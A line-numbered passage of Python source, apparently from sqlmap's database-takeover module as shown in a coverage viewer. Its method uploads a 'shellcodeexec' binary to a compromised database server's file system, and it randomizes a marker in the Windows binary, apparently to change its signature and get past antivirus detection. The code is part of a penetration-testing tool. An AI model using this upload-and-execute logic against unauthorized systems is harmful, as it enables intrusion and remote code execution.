(self, web=False)
| 619 | os.unlink(self._shellcodeFilePath) |
| 620 | |
| 621 | def uploadShellcodeexec(self, web=False): |
| 622 | self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec") |
| 623 | |
| 624 | if Backend.isOs(OS.WINDOWS): |
| 625 | self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") |
| 626 | content = decloak(self.shellcodeexecLocal) |
| 627 | if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: |
| 628 | content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, getBytes(randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))) |
| 629 | _ = cloak(data=content) |
| 630 | handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") |
| 631 | os.close(handle) |
| 632 | with open(self.shellcodeexecLocal, "w+b") as f: |
| 633 | f.write(_) |
| 634 | else: |
| 635 | self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) |
| 636 | |
| 637 | __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") |
| 638 | |
| 639 | self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) |
| 640 | self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) |
| 641 | |
| 642 | logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) |
| 643 | |
| 644 | if web: |
| 645 | written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) |
| 646 | else: |
| 647 | written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) |
| 648 | |
| 649 | if written is not True: |
| 650 | errMsg = "there has been a problem uploading shellcodeexec. It " |
| 651 | errMsg += "looks like the binary file has not been written " |
| 652 | errMsg += "on the database underlying file system or an AV has " |
| 653 | errMsg += "flagged it as malicious and removed it" |
| 654 | logger.error(errMsg) |
| 655 | |
| 656 | return False |
| 657 | else: |
| 658 | logger.info("shellcodeexec successfully uploaded") |
| 659 | return True |
| 660 | |
| 661 | def pwn(self, goUdf=False): |
| 662 | if goUdf: |
no test coverage detected